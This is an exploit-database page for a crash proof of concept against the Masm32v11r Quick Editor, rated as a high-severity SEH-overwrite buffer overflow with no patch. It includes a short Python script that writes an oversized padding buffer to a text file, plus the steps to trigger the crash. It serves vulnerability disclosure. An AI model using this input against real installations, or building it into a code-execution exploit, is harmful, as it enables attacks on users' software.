header-logo
Suggest Exploit
vendor:
Masm32v11r
by:
VIKRAMADITYA -OPTIMUS
7,8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Masm32v11r
Affected Version From: Masm32v11r
Affected Version To: Masm32v11r
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10
2015

Masm32v11r Buffer Overflow(SEH overwrite) crash POC

A buffer overflow vulnerability exists in Masm32v11r which allows an attacker to crash the program by creating a file called MASM_crash.txt with a buffer of 4676 A's, 4 B's, 4 C's and 500 D's and then converting it to a script using the Quick Editor in Masm32.

Mitigation:

Ensure that input validation is performed on all user-supplied data and that all data is properly sanitized before being used.
Source

Exploit-DB raw data:

# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Date of Testing: 22nd September 2015
# Download Link : http://www.masm32.com/masmdl.htm
# Tested On : Windows 10 
# Steps to Crash :-
# Step 1: Execute this python script
# Step 2: This script will create a file called MASM_crash.txt
# Step 3: Now open Masm32's QUICK EDITOR  
# Step 4: Go to Script > 'Convert Text to Script'
# Step 5: Open the MASM_crash.txt to convert 
# Step 6: That should crash the program .  


file = open('MASM_crash.txt' , 'w');
buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500
file.write(buffer);
file.close()